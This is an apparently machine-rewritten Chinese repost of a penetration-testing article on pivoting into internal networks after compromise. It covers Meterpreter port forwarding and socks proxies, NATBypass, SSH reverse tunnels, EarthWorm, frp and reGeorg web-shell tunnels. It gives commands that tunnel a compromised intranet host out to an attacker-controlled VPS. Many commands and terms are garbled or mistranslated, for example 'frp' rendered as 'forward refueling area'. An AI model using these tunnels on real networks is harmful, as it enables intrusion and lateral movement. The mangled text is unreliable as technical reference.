内网渗透攻击,内网渗透方法是什么,内网渗透攻防

  内网渗透攻击,内网渗透方法是什么,内网渗透攻防

  作者:zjun

  原文:https://xz.aliyun.com/t/8001

  本文列举了我使用过的内网代理方法,也加强了内网的渗透代理态度,方便以后调查。

  Meterpreter Meterpreter可以说是渗透中广泛使用的工具。介绍了内网目标外壳反弹后的两种代理方法。

  Portfwd portfwd用于传输单口,是一个很好的方法。例如,如果mydts具有很高的针对性,那么它只需要目标上的3389个端口。

  有关使用语法的详细信息,请参阅https://www . offensive-security . com/metasploit-un released/port FWD/

  大致如下。

  meteterpertportfwdaddl 7003 p 3389 r 192 . 168 . 52 . 138 # transmission-l:服务器接收端口-p:内网主机需要的传输端口-r:目标内网主机ipmeterpretrpertfwddelete-l 3389 p 3389 r 172 . 16 . 194 . r meter preter port FWD Socks代理Socks代理只能在tcp级别,不能代理icmp、arp等。

  msf包含三个内置的socks代理模块,即socks4a、socks5和socks_unc。一般使用socks4a和socks5作为代理。两者的不同之处仅在于支持的具体应用。Socks4只支持TCP协议,但socks5支持TCP/UDP协议和各种认证机制。这意味着您还必须在这里设置您的用户名和密码才能使用socks5。

  向获取外壳的计算机添加一个根目录。

  meteoretrunget _ local _ subnet meterpretrunrenauoutroute-s 192 . 168 . 21 . 0/24 #附加路由meterpreter运行autoroute -p#

  首先,用arp扫描内网可以大致挺过机器的状况。

  meterpretrunpost/windows/gather/ARP _ scanner rhosts=192 . 168 . 21 . 0/24

  然后设置socks4代理,

  meterprebackgroundmsf 5 exploit(multi/handler)使用辅助/服务器/socks 4a ms F5辅助))setsrvhost 127.0.0.1 ms F5辅助(服务器/socks 4a ) setsrvport 1080 ms F5辅助(服务器/socks 4a)运行

  安装后,proxychains配置成功。

  socks5模块也是如此,只是添加了用户名和密码。

  参考:

  3359 blog.csdn.net/QQ _ 36119192/文章/详情/105872076

  klionsec.github.io/2016/09/25/MSF-socks 3359号4a /

  NATBypass NATBypass是一个类似于lcx的端口传输工具,叫做golang版lcx,可以编译成linux或者windows版本。

  具体原理是公网vps监听两个本地端口,内网目标主机建立一个端口转发。例如,如果本地3389被转发到公共网络vps上的一个端口,vps监听的另一个端口相当于内部网络上的主机3389。

  公共网络vps

  Nb -listen 1997 2017内部网主机

  b-slave 127 . 0 . 0 . 133603389 X . X . X . X:1997 # X . X . X . X是公网vps的IP直接访问公网vps的2017端口。

  隧道ssh ssh可以进行端口转发或者建立socks5隧道。

  如果具有公共网络地址的主机使用ssh来创建socks5隧道,那么公共网络主机创建socks5隧道就非常简单。

  ssh -N -f -D 9070 x.x.x

  然后编辑本地/etc/proxychains.conf文件。

  代理成功:

  配置浏览器代理:

  想象一下,当一台公网主机运行在两个内网时,你和目标主机属于不同的内网,无法从外部直接连接。然而幸运的是,两个内部网都可以访问公共网络(JumpHost),所以请考虑在一个公共网络设备中创建两个内部网之间的隧道。

  在目标主机上运行:

  ssh -qTfNn -R 2222

  :本地主机:22 JumpHost

  现在登录到公共网络主机执行:

  ssh -p 2222本地主机

  达到的效果只是将目标主机的端口转发到公网,而没有实现socks代理。想了想,所有尝试都是不成功的。不知是否可行。如果有高手告诉我,我会很感激的!

  参考:3359cherrot.com/tech/2017/01/08/ssh-tunneling-practice.html

  蚯蚓

  简称EW,官方项目已经停止更新,可以在fork地址下载。

  有关详细语法,请参阅:http://rootkiter.com/EarthWorm/。

  EW非常强大,提供了“正向”、“反向”、“多级级联”的方式打通隧道。比较适合不同的操作系统,比如Linux,Windows,MacOS,Arm-Linux。这里有一个简单的反向代理方法。

  公共网络vps执行。/ew _ for _ Linux 64-s RC socks-l 7010-e 7011目标intranet主机执行。\ ew _ for _ win . exe-s RS socks-d x . x . x-e 7011 # windows。/ew _ for _ Linux 64-s RS socks-d x . x . x-e 7011 # Linux本地攻击机可以通过proxychains或browser设置socks5代理到公共vps。

  注:无意中浏览了这个工具作者的博客,发现了这个工具的新版本。在http://rootkiter.com/Termite/有时间测试它之前,请分享它。

  正向补给燃料区(同forward refueling area)

  作为frp的反向代理工具,比稳定性好,但是依赖配置文件,容易追溯。

  项目地址:https://github.com/fatedier/frp

  它可用于端口映射或打开socks隧道。socks隧道代理描述如下。

  公共vps主机的frps.ini文件

  [common] bind _ port=7000token=密码开始frps。/frps -c ./frps.ini目标intranet主机frpc.ini文件

  [common]server _ addr=x . x . x server _ port=7000 token=password[socks 5]type=tcpremote _ port=7004 plugin=socks 5 start frpc。/frpc -c ./frpc.ini本地攻击面可以修改/etc/prxoychains.conf配置文件。

  Socks5 x.x.x.x 7004基于web服务的Socks5隧道简单易用,可以用来突破网络限制。常用的工具有:reGeorg、reDuh、Tunna等。

  方法大致相同。将网站语言对应的脚本文件上传到目标内网服务器,在本地使用脚本连接建立socks5隧道。

  例如,reGeorg:

  根据目标服务器的解析语言,选择脚本上传到服务器端,访问显示Georg说,‘一切看起来都很好’,表示脚本运行正常。

  本地攻击主机正在运行

  python 2 regeorgsocksproxy . py-p 7001-u http://URL/tunnel . PHP

  Georg说,监听端口7001,“一切似乎正常”似乎表明运行正常。可以使用prxoychains作为代理。

  https://www.secshi.com

  学安全,去赛克希。安全师,一个可靠的网络安全学习平台,以高效获取可靠优质内容为己任。安全事业部集合网络安全技术、黑客技术、web安全攻防、代码审计、渗透测试、漏洞挖掘、白帽教程,积累知识,分享经验!吸引和聚集了大量IT行业领域专家,通过人的节点大规模生产和分享优质内容。通过用户分享等沟通方式建立信任和联系,建立和提升个人影响力,发现和获得新的机会。

郑重声明:本文由网友发布,不代表盛行IT的观点,版权归原作者所有,仅为传播更多信息之目的,如有侵权请联系,我们将第一时间修改或删除,多谢。

留言与评论(共有 条评论)
   
验证码: